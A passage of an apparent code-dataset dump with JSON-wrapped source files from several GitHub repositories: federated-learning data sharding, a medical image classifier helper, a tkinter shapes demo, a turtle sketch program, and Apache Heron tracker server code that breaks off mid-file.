idxs_labels[1, :].argsort()]\n idxs = idxs_labels[0, :]\n\n if not unequal:\n random_shard_size = np.array([num_shards//num_users]*num_users)\n else: \n if min_shard is None:\n min_shard = min(1,(num_shards//num_users)-1)\n if max_shard is None:\n max_shard = (num_shards//num_users)+1\n # Divide the shards into random chunks for every client\n # s.t. the sum of these chunks = num_shards \n random_shard_size = np.random.RandomState(seed=0).randint(min_shard, max_shard+1,\n size=num_users) \n random_shard_size = np.around(random_shard_size /\n sum(random_shard_size) * num_shards)\n random_shard_size = random_shard_size.astype(int)\n diffs = sum(random_shard_size)-num_shards\n \n if diffs > 0:\n random_shard_size = np.sort(random_shard_size)[::-1]\n else:\n random_shard_size = np.sort(random_shard_size)\n for i in range(int(abs(diffs))):\n random_shard_size[i] -= np.sign(diffs)\n print(random_shard_size)\n for i in range(num_users):\n shard_size = random_shard_size[i]\n rand_set = set(np.random.RandomState(seed=i).choice(idx_shard, shard_size,replace=False))\n idx_shard = list(set(idx_shard) - rand_set)\n for rand in rand_set:\n dict_users[i] = np.concatenate((dict_users[i], \n idxs[rand*num_imgs:(rand+1)*num_imgs]),axis=0)\n if i%5000==0:\n print(i//5000)\n\n return dict_users\n\n## For test\nif __name__ == '__main__':\n dataset_train = datasets.MNIST('./data/mnist/',\n train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,),\n (0.3081,))\n ]))\n\n # d = dist_datasets_iid(dataset_train, num_users)\n d = dist_datasets_noniid(dataset_train, num_users=50, unequal=1,\n num_shards=100, num_imgs=600, min_shard = 4, max_shard = 4)\n print(np.unique([len(v) for k, v in d.items()]))\n "
},
{
"alpha_fraction": 0.6694915294647217,
"alphanum_fraction": 0.6723163723945618,
"avg_line_length": 31.18181800842285,
"blob_id": "6e526d134180a1d436af62369fc64014f0fed11c",
"content_id": "14db44cd614daccc0211c38a80a8772fcd97dd46",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 354,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 11,
"path": "/private_inference/app/inference.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "from commons import get_model_from_global_agent\n\nd_r_class = [\"No DR\", \"Mild DR\", \"Moderate DR\", \"Severe DR\", \"Proliferative DR\"]\n\n\ndef get_prediction(input_tensor):\n model = get_model_from_global_agent()\n outputs = model.forward(input_tensor)\n _, y_hat = outputs.max(1)\n predicted_idx = int(y_hat.item())\n return d_r_class[predicted_idx]\n"
}
] | 24 |
Nick-Seinsche/Shapes2D
|
https://github.com/Nick-Seinsche/Shapes2D
|
c55a26989ece51062d6c0258d39622a8fe0ece76
|
ca447875ca2d57206582201a06ea7358ad3dd6eb
|
095ddf779a5cca58652b8b5fa24bd65c66f5435a
|
refs/heads/master
| 2022-09-01T05:54:26.618417 | 2019-03-15T14:29:06 | 2019-03-15T14:29:06 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.713178277015686,
"alphanum_fraction": 0.7209302186965942,
"avg_line_length": 15.125,
"blob_id": "63ef3de8823dfe0571e0e9587a239cef83708b14",
"content_id": "ec15440ccb4990b8a8e12ecfa0b0e9f18a6512dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 8,
"path": "/README.md",
"repo_name": "Nick-Seinsche/Shapes2D",
"src_encoding": "UTF-8",
"text": "# Shapes2D\n\nUsage:\nExecute canvas.py\n\nW,A,S,D - Move the currently selected shape\n\nR - Rotate the currently selected shape\n"
},
{
"alpha_fraction": 0.49814125895500183,
"alphanum_fraction": 0.5630376935005188,
"avg_line_length": 32.50533676147461,
"blob_id": "2231e99a35224003b3991d1bbaf062dd211f21c4",
"content_id": "a9111027fcaf7fa7bfd1e0414eb754a0d820c4cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9415,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 281,
"path": "/polygon.py",
"repo_name": "Nick-Seinsche/Shapes2D",
"src_encoding": "UTF-8",
"text": "'''\n Title: polyon.py\n Description: Creates Coordinates for Polygons\n Author: Nick Seinsche\n Libaries:\n Standard Library\n Math\n'''\n\n# imports\nimport math\n\n# CONSTANTS\nPI = math.pi\nsin = lambda x: math.sin(x)\ncos = lambda x: math.cos(x)\n\n\ndef dist(p1: list, p2: list) -> float:\n '''\n Description:\n Returns the distance of two points\n Args:\n p1 (list) - n-dimensional coordinate\n p2 (list) - n-dimensional coordinate\n Returns:\n distance as a float\n Examples:\n >>> dist([1, 2], [3, 4])\n 2.8284271247461903\n >>> dist([1, 2, 3, 8], [3, 4, 16, -3])\n 17.26267650163207\n '''\n dtsq = [(p2[i] - p1[i])**2 for i in range(0, min(len(p1), len(p2)))]\n return math.sqrt(sum(dtsq))\n\n\ndef circle(x: float, y: float, radius: float):\n '''\n Description:\n calculates the coordinates of the outer points a circle bases on\n the angle (radiant)\n Args:\n x - the X-coordinate of the circle center\n y - the Y-coordinate of the circle center\n radius - the radius of the circle\n Returns:\n a lambda function that takes in the angle in radiants and returns\n a (x,y) tuple containing the coordinates of the circles outer point\n at the given angle\n Examples:\n >>> (circle(0,0,1))(0)\n (1.0, 0.0)\n >>> (circle(0,0,1))(pi)\n (-1.0, 1.2246467991473532e-16)\n '''\n return lambda a: (x + math.cos(a) * radius, y + math.sin(a) * radius)\n\n\ndef sphere(x: float, y: float, z: float, radius: float):\n '''\n Description:\n calculates the coordinates of the outer points a circle bases on\n the angle (radiant)\n Args:\n x - the X-coordinate of the spheres center\n y - the Y-coordinate of the spheres center\n z - the Z-coordinate of the spheres center\n radius - the radius of the sphere\n Returns:\n a lambda function that takes in the angle in radiants and returns\n a (a,b,c) tuple containing the coordinates of the circles outer point\n at the given angle\n Examples:\n >>> x(PI/4,PI/4)\n (0.5000000000000001, 0.5000000000000001, 0.7071067811865476)\n >>> x(PI/4,PI/3)\n (0.6123724356957946, 0.6123724356957946, 0.5000000000000001)\n '''\n return lambda s,t: (x + radius * cos(s) * sin(t),\n y + radius * sin(s) * sin(t),\n z + radius * cos(t))\n\n\ndef translate(origin: list, p3: list, p2: list) -> None:\n pass\n\n\nclass Shape:\n '''\n Description:\n Generic Class for Polygons\n Args:\n x - x-coordinate of shape\n y - y-coordinate of shape\n points - list of coordinate of points of the shape\n cirlce - instance of the circle function\n Methods:\n get() - returns the list of points\n __next__\n '''\n def __init__(self, x: float, y: float, size: float) -> None:\n self.x = x\n self.y = y\n self.points = []\n self.circle = circle(x, y, size)\n\n def update(self):\n print('no update funtion implemented')\n\n def rotate(self, angle: float, update=True) -> None:\n if not angle:\n if update:\n self.update()\n return\n self.rotAngle -= angle\n if update:\n self.update()\n\n def move(self, dx: float, dy: float, update=True) -> None:\n if not dx and not dy:\n if update:\n self.update()\n return\n for i in range(0, len(self.points)):\n self.points[i] = (self.points[i][0] + dx, self.points[i][1] + dy)\n self.x += dx\n self.y += dy\n if update:\n self.update()\n\n def get(self) -> list:\n return self.points\n\n def __iter__(self):\n return self\n\n def __next__(self) -> float:\n if self.next is None:\n self.next = 0\n self.next += 1\n return self.points[self.next-1]\n\n\nclass isoTriangle(Shape):\n '''\n Description:\n Class for an isosceles triangle. 
Calculates the three points of the\n triangle based on location, angle, size and rotation\n Args:\n x - x-coordinate of the top point of the triangle\n y - y-coordinate of the top point of the triangle\n innerAngle - the angle at the top point of the triangle (radiants)\n rotAngle - the angle the triangle is rotated (radiants)\n Methods:\n get() - inherited from Polygon\n Examples:\n >>> isoTriangle(0,0,1,3,0).get()\n (0, 0),\n (-1.4382766158126088, -2.6327476856711183),\n (1.4382766158126092, -2.632747685671118)\n '''\n def __init__(self, x: float, y: float, innerAngle: float,\n side_length: float, rotAngle: float) -> None:\n super().__init__(x, y, side_length)\n self.points.append((x, y))\n self.innerAngle = innerAngle\n self.side_length = side_length\n self.rotAngle = rotAngle\n self.points.append(self.circle(rotAngle + PI/2 - innerAngle/2))\n self.points.append(self.circle(rotAngle + PI/2 + innerAngle/2))\n\n def update(self) -> None:\n self.circle = circle(self.x, self.y, self.side_length)\n self.points[0] = (self.x, self.y)\n self.points[1] = self.circle(\n self.rotAngle + PI/2 - self.innerAngle/2)\n self.points[2] = self.circle(\n self.rotAngle + PI/2 + self.innerAngle/2)\n\n\nclass regPolygon(Shape):\n '''\n Description:\n Class for a regular polyon (a polygon where all sides have the same\n length and all inner angles are the same). Calculates the n points\n of the polygon based on location and rotation angle\n Args:\n x - x-coordinate of the center of the polygon\n y - y-coordinate of the center of the polygon\n n - number of sides the polyon should have\n rotAngle - the angle the polygon should be rotated by\n Methods:\n get() returns a list of 2-tuples of coordinates of the points\n update() updates the points\n rotate(float) rotates the polygon clockwiese for positive values\n move(float, float) adds the point to the position\n Examples:\n >>> regPolygon(0,0,3,1,0).get()\n [(-0.4999999999999992, 0.8660254037844392),\n (-0.5000000000000013, -0.8660254037844378),\n (1.0, -4.898587196589413e-16)]\n '''\n def __init__(self, x: float, y: float, size: float, rotAngle: float,\n n: int) -> None:\n super().__init__(x, y, size)\n self.n = n\n self.size = size\n self.rotAngle = rotAngle\n for i in range(0, n):\n self.points.append(self.circle(\n rotAngle - PI/2 + (i / n) * 2 * PI)\n )\n\n def update(self) -> None:\n self.circle = circle(self.x, self.y, self.size)\n for i in range(0, self.n):\n self.points[i] = self.circle(\n self.rotAngle - PI/2 + (i / self.n) * 2 * PI\n )\n\n\nclass regStar(Shape):\n '''\n Description:\n Calculates the points for a star with equal side length\n Args:\n x - x-coordinate of the stars center\n y - y-coordinate of the stars center\n size - the size of the body of the star\n rotAngle - the rotational angle (radiants)\n n - number of sides the star should have\n ratio - the ratio between the body and the legs\n Methods:\n get() returns a list of 2-tuples of coordinates of the points\n update() updates the points\n rotate(float) rotates the polygon clockwiese for positive values\n move(float, float) adds the point to the position\n Examples:\n >>> regStar(0, 0, 25, PI, 3, 1.8).get()\n [(2.7554552980815448e-15, 45.0), (2.7554552980815448e-15, 45.0),\n (-38.97114317029975, -22.499999999999986), (-38.97114317029975,\n -22.499999999999986), (38.971143170299726, -22.50000000000002),\n (38.971143170299726, -22.50000000000002)]\n '''\n def __init__(self, x: float, y: float, size: float, rotAngle: float,\n n: int, ratio: float) -> None:\n super().__init__(x, y, 
size)\n self.x_new = self.x\n self.y_new = self.y\n self.size = size\n self.rotAngle = rotAngle\n self.n = n\n self.ratio = ratio\n self.poly = regPolygon(x, y, size, rotAngle, n)\n self.big_poly = regPolygon(x, y, size * ratio, rotAngle - PI / n, n)\n for i in range(0, 2 * len(self.poly.points)):\n if i % 2 == 0:\n self.points.append(self.big_poly.points[int(i / 2)])\n elif i % 2 == 1:\n self.points.append(self.big_poly.points[int((i - 1) / 2)])\n\n def update(self) -> None:\n self.points = []\n self.poly = regPolygon(self.x, self.y, self.size,\n self.rotAngle - PI/self.n, self.n)\n self.big_poly = regPolygon(self.x, self.y, self.size*self.ratio,\n self.rotAngle, self.n)\n for i in range(0, 2 * len(self.poly.points)):\n if i % 2 == 0:\n self.points.append(self.poly.points[int(i / 2)])\n elif i % 2 == 1:\n self.points.append(self.big_poly.points[int((i - 1) / 2)])\n\n\nif __name__ == \"__main__\":\n # print(regStar(0, 0, 25, PI, 3, 1.8).get())\n # print(dist([1, 2, 3, 8], [3, 4, 16, -3]))\n sp = sphere(0,0,0,1)\n print(sp(PI/2,0))\n pass\n"
},
{
"alpha_fraction": 0.5654237270355225,
"alphanum_fraction": 0.5932203531265259,
"avg_line_length": 29.412370681762695,
"blob_id": "b3b2afb9e04548361918fbec7d148b816792a086",
"content_id": "ddecbe9c0f00a6dcfb9085ae9d5077bf7938aa74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2950,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 97,
"path": "/canvas.py",
"repo_name": "Nick-Seinsche/Shapes2D",
"src_encoding": "UTF-8",
"text": "import tkinter as tk\nimport time\nimport polygon as poly\n\nroot = tk.Tk()\nentities = []\nentity_active = 0\nrunning = True\n\n\nclass entity:\n def __init__(self, cv, shape):\n global entity_active\n self.shape = shape # shape class from polygon\n self.cv = cv # canvas\n self.vx = 0 # x - velocity\n self.vy = 0 # y - velocity\n self.vr = 0 # rotation velocity\n self.color = 'black' # color\n entity_active = len(entities) # set active entity to current\n entities.append(self) # append entity to entity list\n self.id = cv.create_polygon(self.shape.get(), fill=self.color)\n\n def update(self):\n # update color\n if (entities.index(self) == entity_active) and self.color != 'red':\n self.color = 'red'\n elif (entities.index(self) != entity_active) and self.color == 'red':\n self.color = 'black'\n self.vx, self.vy, self.vr = 0, 0, 0\n self.inner_update()\n\n def inner_update(self):\n self.delete_id()\n self.shape.move(self.vx, self.vy, False)\n self.shape.rotate(self.vr)\n self.id = cv.create_polygon(self.shape.get(), fill=self.color)\n\n def delete_id(self):\n self.cv.delete(self.id)\n\n\ncv = tk.Canvas(root, width=800, height=600)\ncv.pack()\n\n# entities\nentity(cv, poly.regPolygon(100, 300, 60, 0, 5))\nentity(cv, poly.regStar(300, 300, 20, 0, 5, 2.3))\nentity(cv, poly.isoTriangle(500, 500, 70, 90, 0))\n\n\ndef callback(event):\n global entity_active, entities\n press = True if str(event.type) is 'KeyPress' else False\n if event.keycode == 87:\n entities[entity_active].vy = -2 if press else 0\n elif event.keycode == 83:\n entities[entity_active].vy = 2 if press else 0\n elif event.keycode == 65:\n entities[entity_active].vx = -2 if press else 0\n elif event.keycode == 68:\n entities[entity_active].vx = 2 if press else 0\n elif event.keycode == 81:\n entities[entity_active].vr = 0.03 if press else 0\n elif event.keycode == 69:\n entities[entity_active].vr = -0.03 if press else 0\n elif event.keycode == 32 and press:\n # entities[entity_active].color = 'black'\n entity_active = (entity_active + 1) % len(entities)\n # entities[entity_active].color = 'red'\n\n\ndef close(*ignore):\n \"\"\" Stops simulation loop and closes the window. \"\"\"\n global running\n running = False\n root.destroy()\n\n\ndef mainloop():\n t, dt = time.time(), 0\n while running:\n time.sleep(max(0.02 - dt, 0))\n tnew = time.time()\n t, dt = tnew, tnew - t\n for e in entities:\n e.update()\n cv.update()\n\n\nroot.bind('<KeyPress>', callback) # setting keylistener\nroot.bind('<KeyRelease>', callback) # setting keylistener\nroot.protocol(\"WM_DELETE_WINDOW\", close) # correctly close the window\n\n\nmainloop()\nroot.mainloop()\n"
}
] | 3 |
JoseRotsaert/EtchASketch
|
https://github.com/JoseRotsaert/EtchASketch
|
12f1cdd8d823b0c2873c06c23ad08c955ab81ffa
|
98e69daf9634cf404d643ab87063cb4347e5ab31
|
ab57432f958676b71f371849670d82889ff681aa
|
refs/heads/master
| 2023-03-27T05:53:40.113859 | 2021-03-27T21:01:03 | 2021-03-27T21:01:03 | 352,176,216 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6757532358169556,
"alphanum_fraction": 0.6843615770339966,
"avg_line_length": 16.424999237060547,
"blob_id": "3641ddc35c7cafee6ed3b6a71f1a5e16f9039b2f",
"content_id": "74de851f920192b136ae084cc7f2bcdfc3bf3f80",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 697,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 40,
"path": "/main.py",
"repo_name": "JoseRotsaert/EtchASketch",
"src_encoding": "UTF-8",
"text": "from turtle import Turtle, Screen\n\ntim = Turtle()\nscreen = Screen()\n\n\ndef move_forward():\n tim.fd(10)\n\n\ndef move_backward():\n tim.bk(10)\n\n\ndef rotate_clockwise():\n current_heading = tim.heading()\n current_heading += 5\n tim.setheading(current_heading)\n\n\ndef rotate_counter_clockwise():\n current_heading = tim.heading()\n current_heading -= 5\n tim.setheading(current_heading)\n\n\ndef clear():\n screen.clear()\n tim.home()\n\n\nscreen.listen()\n\nscreen.onkey(key=\"w\", fun=move_forward)\nscreen.onkey(key=\"s\", fun=move_backward)\nscreen.onkey(key=\"a\", fun=rotate_counter_clockwise)\nscreen.onkey(key=\"d\", fun=rotate_clockwise)\nscreen.onkey(key=\"c\", fun=clear)\n\nscreen.exitonclick()\n"
}
] | 1 |
joshfischer1108/incubator-heron
|
https://github.com/joshfischer1108/incubator-heron
|
b79a1485fd3cb915d6b40828bf41e1e9e1308d1a
|
7f32cc532b17e9a44a2b1fa93e56b7cf105aa78f
|
25a5ad9528a5efd05d7992fc8ac25dbdcfae3e38
|
refs/heads/master
| 2023-03-03T13:06:58.430449 | 2021-05-24T12:48:06 | 2021-05-24T12:48:06 | 127,474,384 | 0 | 1 |
Apache-2.0
| 2018-03-30T21:24:37 | 2018-03-30T06:27:18 | 2018-03-30T20:10:28 | null |
[
{
"alpha_fraction": 0.6936802864074707,
"alphanum_fraction": 0.6959107518196106,
"avg_line_length": 33.93506622314453,
"blob_id": "5218cf27bcb21949bbcd877f74f7a19916e74d15",
"content_id": "345ee55437a91e75b0337311ad8723e27cddd6db",
"detected_licenses": [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8070,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 231,
"path": "/heron/tools/tracker/src/python/main.py",
"repo_name": "joshfischer1108/incubator-heron",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- encoding: utf-8 -*-\n\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n''' main.py '''\nimport logging\nimport os\nimport signal\nimport sys\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.web\nfrom tornado.options import define\nfrom tornado.httpclient import AsyncHTTPClient\n\nfrom heron.tools.common.src.python.utils import config as common_config\nfrom heron.common.src.python.utils import log\nfrom heron.tools.tracker.src.python import constants\nfrom heron.tools.tracker.src.python import handlers\nfrom heron.tools.tracker.src.python import utils\nfrom heron.tools.tracker.src.python.config import Config, STATEMGRS_KEY\nfrom heron.tools.tracker.src.python.tracker import Tracker\n\nimport click\n\nLog = log.Log\n\nclass Application(tornado.web.Application):\n \"\"\" Tornado server application \"\"\"\n def __init__(self, config):\n\n AsyncHTTPClient.configure(None, defaults=dict(request_timeout=120.0))\n self.tracker = Tracker(config)\n self.tracker.synch_topologies()\n tornadoHandlers = [\n (r\"/\", handlers.MainHandler),\n (r\"/clusters\", handlers.ClustersHandler, {\"tracker\":self.tracker}),\n (r\"/topologies\", handlers.TopologiesHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/states\", handlers.StatesHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/info\", handlers.TopologyHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/logicalplan\", handlers.LogicalPlanHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/config\", handlers.TopologyConfigHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/containerfiledata\", handlers.ContainerFileDataHandler,\n {\"tracker\":self.tracker}),\n (r\"/topologies/containerfiledownload\", handlers.ContainerFileDownloadHandler,\n {\"tracker\":self.tracker}),\n (r\"/topologies/containerfilestats\",\n handlers.ContainerFileStatsHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/physicalplan\", handlers.PhysicalPlanHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/packingplan\", handlers.PackingPlanHandler, {\"tracker\":self.tracker}),\n # Deprecated. 
See https://github.com/apache/incubator-heron/issues/1754\n (r\"/topologies/executionstate\", handlers.ExecutionStateHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/schedulerlocation\", handlers.SchedulerLocationHandler,\n {\"tracker\":self.tracker}),\n (r\"/topologies/metadata\", handlers.MetaDataHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/runtimestate\", handlers.RuntimeStateHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/metrics\", handlers.MetricsHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/metricstimeline\", handlers.MetricsTimelineHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/metricsquery\", handlers.MetricsQueryHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/exceptions\", handlers.ExceptionHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/exceptionsummary\", handlers.ExceptionSummaryHandler,\n {\"tracker\":self.tracker}),\n (r\"/machines\", handlers.MachinesHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/pid\", handlers.PidHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/jstack\", handlers.JstackHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/jmap\", handlers.JmapHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/histo\", handlers.MemoryHistogramHandler, {\"tracker\":self.tracker}),\n (r\"(.*)\", handlers.DefaultHandler),\n ]\n\n settings = dict(\n debug=True,\n serve_traceback=True,\n static_path=os.path.dirname(__file__)\n )\n tornado.web.Application.__init__(self, tornadoHandlers, **settings)\n Log.info(\"Tracker has started\")\n\n def stop(self):\n self.tracker.stop_sync()\n\n\ndef define_options(port: int, config_file: str) -> None:\n \"\"\" define Tornado global variables \"\"\"\n define(\"port\", default=port)\n define(\"config_file\", default=config_file)\n\n\ndef create_tracker_config(config_file: str, stmgr_override: dict) -> dict:\n # try to parse the config file if we find one\n config = utils.parse_config_file(config_file)\n if config is None:\n Log.debug(f\"Config file does not exists: {config_file}\")\n config = {STATEMGRS_KEY:[{}]}\n\n # update non-null options\n config[STATEMGRS_KEY][0].update(\n (k, v)\n for k, v in stmgr_override.items()\n if v is not None\n )\n return config\n\n\ndef show_version(_, __, value):\n if value:\n common_config.print_build_info()\n sys.exit(0)\n\n\[email protected]()\[email protected](\n \"--version\",\n is_flag=True,\n is_eager=True,\n expose_value=False,\n callback=show_version,\n)\[email protected]('--verbose', is_flag=True)\[email protected](\n '--config-file',\n help=\"path to a tracker config file\",\n default=os.path.join(utils.get_heron_tracker_conf_dir(), constants.DEFAULT_CONFIG_FILE),\n show_default=True,\n)\[email protected](\n '--port',\n type=int,\n default=constants.DEFAULT_PORT,\n show_default=True,\n help=\"local port to serve on\",\n)\[email protected](\n '--type',\n \"stmgr_type\",\n help=f\"statemanager type e.g. {constants.DEFAULT_STATE_MANAGER_TYPE}\",\n type=click.Choice(choices=[\"file\", \"zookeeper\"]),\n)\[email protected](\n '--name',\n help=f\"statemanager name e.g. {constants.DEFAULT_STATE_MANAGER_NAME}\",\n)\[email protected](\n '--rootpath',\n help=f\"statemanager rootpath e.g. {constants.DEFAULT_STATE_MANAGER_ROOTPATH}\",\n)\[email protected](\n '--tunnelhost',\n help=f\"statemanager tunnelhost e.g. {constants.DEFAULT_STATE_MANAGER_TUNNELHOST}\",\n)\[email protected](\n '--hostport',\n help=f\"statemanager hostport e.g. 
{constants.DEFAULT_STATE_MANAGER_HOSTPORT}\",\n)\ndef cli(\n config_file: str,\n stmgr_type: str,\n name: str,\n rootpath: str,\n tunnelhost: str,\n hostport: str,\n port: int,\n verbose: bool,\n) -> None:\n \"\"\"\n A HTTP service for serving data about clusters.\n\n The statemanager's config from the given config file can be overrided using\n options on this executable.\n\n \"\"\"\n\n log.configure(logging.DEBUG if verbose else logging.INFO)\n\n # set Tornado global option\n define_options(port, config_file)\n\n stmgr_override = {\n \"type\": stmgr_type,\n \"name\": name,\n \"rootpath\": rootpath,\n \"tunnelhost\": tunnelhost,\n \"hostport\": hostport,\n }\n config = Config(create_tracker_config(config_file, stmgr_override))\n\n # create Tornado application\n application = Application(config)\n\n # pylint: disable=unused-argument\n # SIGINT handler:\n # 1. stop all the running zkstatemanager and filestatemanagers\n # 2. stop the Tornado IO loop\n def signal_handler(signum, frame):\n # start a new line after ^C character because this looks nice\n print('\\n', end='')\n application.stop()\n tornado.ioloop.IOLoop.instance().stop()\n\n # associate SIGINT and SIGTERM with a handler\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n\n Log.info(\"Running on port: %d\", port)\n if config_file:\n Log.info(\"Using config file: %s\", config_file)\n Log.info(f\"Using state manager:\\n{config}\")\n\n http_server = tornado.httpserver.HTTPServer(application)\n http_server.listen(port)\n\n tornado.ioloop.IOLoop.instance().start()\n\nif __name__ == \"__main__\":\n cli() # pylint: disable=no-value-for-parameter\n"
},
{
"alpha_fraction": 0.6320284605026245,
"alphanum_fraction": 0.6331405639648438,
"avg_line_length": 34.01557540893555,
"blob_id": "7b0f50f4034956933fd83c5b9e832b195a0e50a4",
"content_id": "4a3f36f8ea92843e12edf2a18867357b0c79c0c2",
"detected_licenses": [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22480,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 642,
"path": "/heron/tools/tracker/src/python/tracker.py",
"repo_name": "joshfischer1108/incubator-heron",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- encoding: utf-8 -*-\n\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n''' tracker.py '''\nimport json\nimport sys\nimport collections\n\nfrom functools import partial\nfrom typing import Any, Dict, List, Optional, Tuple\n\nfrom heron.common.src.python.utils.log import Log\nfrom heron.proto import topology_pb2\nfrom heron.statemgrs.src.python import statemanagerfactory\nfrom heron.tools.tracker.src.python.config import EXTRA_LINK_FORMATTER_KEY, EXTRA_LINK_URL_KEY\nfrom heron.tools.tracker.src.python.topology import Topology\nfrom heron.tools.tracker.src.python import utils\n\nimport javaobj.v1 as javaobj\n\ndef convert_pb_kvs(kvs, include_non_primitives=True) -> dict:\n \"\"\"\n converts pb kvs to dict\n \"\"\"\n config = {}\n for kv in kvs:\n if kv.value:\n config[kv.key] = kv.value\n elif kv.serialized_value:\n # add serialized_value support for python values (fixme)\n\n # is this a serialized java object\n if topology_pb2.JAVA_SERIALIZED_VALUE == kv.type:\n jv = _convert_java_value(kv, include_non_primitives=include_non_primitives)\n if jv is not None:\n config[kv.key] = jv\n else:\n config[kv.key] = _raw_value(kv)\n return config\n\n\ndef _convert_java_value(kv, include_non_primitives=True):\n try:\n pobj = javaobj.loads(kv.serialized_value)\n if isinstance(pobj, str):\n return pobj\n\n if isinstance(pobj, javaobj.transformers.DefaultObjectTransformer.JavaPrimitiveClass):\n return pobj.value\n\n if include_non_primitives:\n # java objects that are not strings return value and encoded value\n # Hexadecimal byte array for Serialized objects that\n return {\n 'value' : json.dumps(pobj,\n default=lambda custom_field: custom_field.__dict__,\n sort_keys=True,\n indent=2),\n 'raw' : kv.serialized_value.hex()}\n\n return None\n except Exception:\n Log.exception(\"Failed to parse data as java object\")\n if include_non_primitives:\n return _raw_value(kv)\n return None\n\ndef _raw_value(kv):\n return {\n # The value should be a valid json object\n 'value' : '{}',\n 'raw' : kv.serialized_value.hex()}\n\n\nclass Tracker:\n \"\"\"\n Tracker is a stateless cache of all the topologies\n for the given state managers. 
It watches for\n any changes on the topologies, like submission,\n killing, movement of containers, etc..\n\n This class caches all the data and is accessed\n by handlers.\n \"\"\"\n\n def __init__(self, config):\n self.config = config\n self.topologies = []\n self.state_managers = []\n\n # A map from a tuple of form\n # (topology_name, state_manager_name) to its\n # info, which is its representation\n # exposed through the APIs.\n # The state_manager_name help when we\n # want to remove the topology,\n # since other info can not be relied upon.\n self.topology_infos: Dict[Tuple[str, str], Any] = {}\n\n def synch_topologies(self) -> None:\n \"\"\"\n Sync the topologies with the statemgrs.\n \"\"\"\n self.state_managers = statemanagerfactory.get_all_state_managers(self.config.statemgr_config)\n try:\n for state_manager in self.state_managers:\n state_manager.start()\n except Exception as e:\n Log.critical(f\"Found exception while initializing state managers: {e}\", exc_info=True)\n sys.exit(1)\n\n def on_topologies_watch(state_manager, topologies) -> None:\n \"\"\"watch topologies\"\"\"\n Log.info(\"State watch triggered for topologies.\")\n Log.debug(\"Topologies: \" + str(topologies))\n cached_names = [t.name for t in self.get_stmgr_topologies(state_manager.name)]\n Log.debug(f\"Existing topologies: {cached_names}\")\n for name in cached_names:\n if name not in topologies:\n Log.info(\"Removing topology: %s in rootpath: %s\",\n name, state_manager.rootpath)\n self.remove_topology(name, state_manager.name)\n\n for name in topologies:\n if name not in cached_names:\n self.add_new_topology(state_manager, name)\n\n for state_manager in self.state_managers:\n # The callback function with the bound\n # state_manager as first variable.\n onTopologiesWatch = partial(on_topologies_watch, state_manager)\n state_manager.get_topologies(onTopologiesWatch)\n\n def stop_sync(self) -> None:\n for state_manager in self.state_managers:\n state_manager.stop()\n\n def get_topology(\n self,\n cluster: str,\n role: Optional[str],\n environ: str,\n topology_name: str,\n ) -> Any:\n \"\"\"\n Find and return the 